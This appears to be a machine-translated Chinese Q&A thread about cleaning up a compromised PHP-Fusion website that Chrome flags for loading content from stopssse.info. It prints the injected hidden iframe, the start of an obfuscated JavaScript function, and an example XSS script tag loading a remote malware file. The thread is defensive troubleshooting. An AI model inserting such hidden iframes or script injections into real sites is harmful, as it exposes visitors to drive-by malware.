我的一些朋友有一个网站(www.kennelsoffie.dk),当我遇到麻烦时,我正在帮助他们。 不过这一次,我想不出来。 当我使用Google Chrome浏览器访问网站时,出现了一个警告页面,声称我正在访问的网页包含来自stopssse.info的元素。
我不知道任何PHP,所以我只是下载完整的网站,包括数据库的备份(这是.sql文件)。 然后,我search了所有的文件stopssse,但我没有find任何东西。
我也用siteadvisor.comtesting了这个站点,它说:“我们testing了这个站点,没有发现任何重大的问题”。
PHP可以隐藏对恶意软件网站的引用,所以我不能通过简单的searchfind它? 如果是这样,你怎么find它?
我在生成的源代码中find了这个
<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;"> 它正好位于body标签的下方,它不在实际的页面源代码中,而是由混淆的javascript添加的
编辑:如果你看看http://www.kennelsoffie.dk/includes/jscript.js的底部,你会看到一个非常奇怪的JavaScriptfunction。 这是我告诉你的混淆的JavaScript函数。 它开始
function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var
最好的办法是find并删除它。
你最有可能处理XSS攻击。
在这种情况下,两个步骤:
恶意软件可能不在网站上,但可能来自外部来源的材料,例如广告。
如果该网站是通过跨站点脚本 “感染”的,那么你所拥有的可能是一个用户提交的评论,其中包含如下内容:
<SCRIPT SRC="http://stopssse.info/malware.js"></SCRIPT>
但请注意,有许多变体试图隐藏外部脚本被执行的事实,并且这些变体也可能会修改源URL,导致简单的stringsearch失败。
在网站上运行的PHP-Fusion版本似乎是v6.01.3,看起来是一个相当老的版本,所以升级它可能是一个好主意。
似乎已经有相当多的PHP-Fusion安全公告,包括一些SQL注入问题。
PHP-Fusion的完整build议列表: http ://secunia.com/advisories/product/5291/?task= advisories
在实际的目录中查找任何特殊的文件。 可能有一个文件通过不安全的上载格式上传,将附加数据写入输出。 告诉你的朋友改变他的账户信息,并开始审查他的网站的安全。
在那里,检查PHP文件(searchstopssse)。
在一般情况下,寻找混淆的javascrot,这个工具通常是有用的: Wepawet